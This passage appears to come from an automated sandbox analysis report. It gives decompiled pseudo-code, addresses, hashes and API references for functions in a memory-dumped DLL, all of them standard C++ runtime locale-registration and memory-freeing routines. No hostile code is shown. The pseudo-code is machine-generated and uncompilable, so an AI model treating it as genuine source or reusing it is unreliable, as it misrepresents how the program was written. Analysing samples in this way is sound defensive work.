																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6d53fdd8 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6D478A0B(__eflags, _t682);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6d53fddc = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6D478A0B(__eflags, _t681);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6d53fe08 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6D478A0B(__eflags, _t680);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6d53fe0c = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6D478A0B(__eflags, _t679);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6d53fdd4 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6D478A0B(__eflags, _t678);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6d53fe04 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6D478A0B(__eflags, _t677);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6d53fdd0 = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6D478A0B(__eflags, _t676);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6d53fe00 = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

0x6d48075e
0x6d48075e
0x6d48075e
0x6d480765
0x6d48076f
0x6d480774
0x6d48077f
0x6d480783
0x6d480786
0x6d48078b
0x6d48078f
0x6d480794
0x6d480798
0x6d4807dd
0x6d4807e0
0x6d4807ec
0x6d48079a
0x6d48079c
0x6d4807a2
0x6d4807a8
0x6d4807b0
0x6d4807b3
0x6d4807f0
0x6d4807fe
0x6d480803
0x6d480804
0x6d48080b
0x6d480815
0x6d48081a
0x6d480825
0x6d480829
0x6d48082c
0x6d480831
0x6d48083a
0x6d48083c
0x6d48083e
0x6d480883
0x6d480886
0x6d480892
0x6d480840
0x6d480840
0x6d480842
0x6d480848
0x6d48084e
0x6d480856
0x6d480859
0x6d480896
0x6d4808a4
0x6d4808a9
0x6d4808aa
0x6d4808b1
0x6d4808bb
0x6d4808c0
0x6d4808cb
0x6d4808cf
0x6d4808d2
0x6d4808d7
0x6d4808e0
0x6d4808e2
0x6d4808e4
0x6d480929
0x6d48092c
0x6d480938
0x6d4808e6
0x6d4808e6
0x6d4808e8
0x6d4808ee
0x6d4808f4
0x6d4808fc
0x6d4808ff
0x6d48093c
0x6d48094a
0x6d48094f
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480986
0x6d480988
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c

APIs

__EH_prolog3.LIBCMT ref: 6D480765
std::_Lockit::_Lockit.LIBCPMT ref: 6D48076F

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D4807C0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4807E0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4807FE

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 178cb6a08829835e754e2cbde1bae878978741f6a86a1b0a5b6e98df282aca1e
Instruction ID: 177bcea6f51a6758e95a3f8c7eabc97e9f89100572e05defd5642680c2618e72
Opcode Fuzzy Hash: 178cb6a08829835e754e2cbde1bae878978741f6a86a1b0a5b6e98df282aca1e
Instruction Fuzzy Hash: 7D119A36C042298BCF05DBA6C880EEE7775AF85764F26041DD611AB2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481118, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E6D481118(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				void* _t70;

				_t48 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t66 - 0x14, 0);
				_t63 =  *0x6d53fde4; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D451D10();
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D452140( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D476A77(_t66 - 0x14);
					return E6D490E67(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D482AC8(__ebx, _t51, __edx, _t61, _t63, __eflags, _t70) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6D451940();
							E6D4924F4(_t66 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(4);
							E6D490E9E(0x6d4fefbc, __ebx, _t61, _t63);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_push( *((intOrPtr*)(_t66 + 8)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d5041ac;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D4868B7(_t48, _t55, __edx, _t61, _t64,  *_t21, _t70);
							return E6D490E67(_t64);
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D478A0B(__eflags, _t61);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d53fde4 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6d481118
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d481149
0x6d48114e
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156

APIs

__EH_prolog3.LIBCMT ref: 6D48111F
std::_Lockit::_Lockit.LIBCPMT ref: 6D481129

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48117A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48119A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4811B8

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 63fac249bb9199b4735a7097ea67c4390d4c1cdb9fabf93bed118768e4c7572c
Instruction ID: a64a38f7622a72738fa2c718d071efc2c267bad24b69968b7ee469d6923e52d0
Opcode Fuzzy Hash: 63fac249bb9199b4735a7097ea67c4390d4c1cdb9fabf93bed118768e4c7572c
Instruction Fuzzy Hash: 10119A368042299BCF15DFA4C844EFE7B75AF86354F26040ED625AB290DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481072, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6D481072(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;
				void* _t114;

				_t79 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t110 - 0x14, 0);
				_t105 =  *0x6d53fe14; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6D451D10();
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6D452140( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6D476A77(_t110 - 0x14);
					return E6D490E67(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6D482A62(__ebx, _t82, __edx, _t102, _t105, __eflags, _t114) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t110 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t102, _t105);
							E6D476A10(_t110 - 0x14, 0);
							_t106 =  *0x6d53fde4; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6D451D10();
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6D452140( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6D476A77(_t110 - 0x14);
								return E6D490E67(_t103);
							} else {
								__eflags = _t106;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6D482AC8(__ebx, _t89, __edx, _t103, _t106, __eflags, _t114) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6D451940();
										E6D4924F4(_t110 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(4);
										E6D490E9E(0x6d4fefbc, _t79, _t103, _t106);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_push( *((intOrPtr*)(_t110 + 8)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6d5041ac;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6D4868B7(_t79, _t93, __edx, _t103, _t107,  *_t35, _t114);
										return E6D490E67(_t107);
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6D478A0B(__eflags, _t103);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6d53fde4 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6D478A0B(__eflags, _t102);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6d53fe14 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6d481072
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a3
0x6d4810a8
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0

APIs

__EH_prolog3.LIBCMT ref: 6D481079
std::_Lockit::_Lockit.LIBCPMT ref: 6D481083

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D4810D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4810F4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D481112

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a9b635d19ce979826a2aeaf74bf7833fcc6bbe44fafeafd421f52ef29940b219
Instruction ID: 97326177e85ec5436a9785dfc038d60680295897353fa403b150e812f36207e0
Opcode Fuzzy Hash: a9b635d19ce979826a2aeaf74bf7833fcc6bbe44fafeafd421f52ef29940b219
Instruction Fuzzy Hash: 1B11A0329041698BCF15DB65C840EEE7775AF85358F26440EE611AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC438, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CC438(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6d5340c8; // 0x6d5340c0
					if(_t23 != 0) {
						E6D4C02CE(_t7);
					}
					_t2 = _t21 + 4; // 0x25
					_t24 =  *_t2 -  *0x6d5340cc; // 0x6d540288
					if(_t24 != 0) {
						E6D4C02CE(_t8);
					}
					_t3 = _t21 + 8; // 0x534a50a0
					_t25 =  *_t3 -  *0x6d5340d0; // 0x6d540288
					if(_t25 != 0) {
						E6D4C02CE(_t9);
					}
					_t4 = _t21 + 0x30; // 0x534a40a2
					_t26 =  *_t4 -  *0x6d5340f8; // 0x6d5340c4
					if(_t26 != 0) {
						E6D4C02CE(_t10);
					}
					_t5 = _t21 + 0x34; // 0x80cc2a6d
					_t6 =  *_t5;
					_t27 = _t6 -  *0x6d5340fc; // 0x6d54028c
					if(_t27 != 0) {
						return E6D4C02CE(_t6);
					}
				}
				return _t6;
			}

0x6d4cc43e
0x6d4cc443
0x6d4cc447
0x6d4cc44d
0x6d4cc450
0x6d4cc455
0x6d4cc456
0x6d4cc459
0x6d4cc45f
0x6d4cc462
0x6d4cc467
0x6d4cc468
0x6d4cc46b
0x6d4cc471
0x6d4cc474
0x6d4cc479
0x6d4cc47a
0x6d4cc47d
0x6d4cc483
0x6d4cc486
0x6d4cc48b
0x6d4cc48c
0x6d4cc48c
0x6d4cc48f
0x6d4cc495
0x00000000
0x6d4cc49d
0x6d4cc495
0x6d4cc4a0

APIs

_free.LIBCMT ref: 6D4CC450

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CC462
_free.LIBCMT ref: 6D4CC474
_free.LIBCMT ref: 6D4CC486
_free.LIBCMT ref: 6D4CC498

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
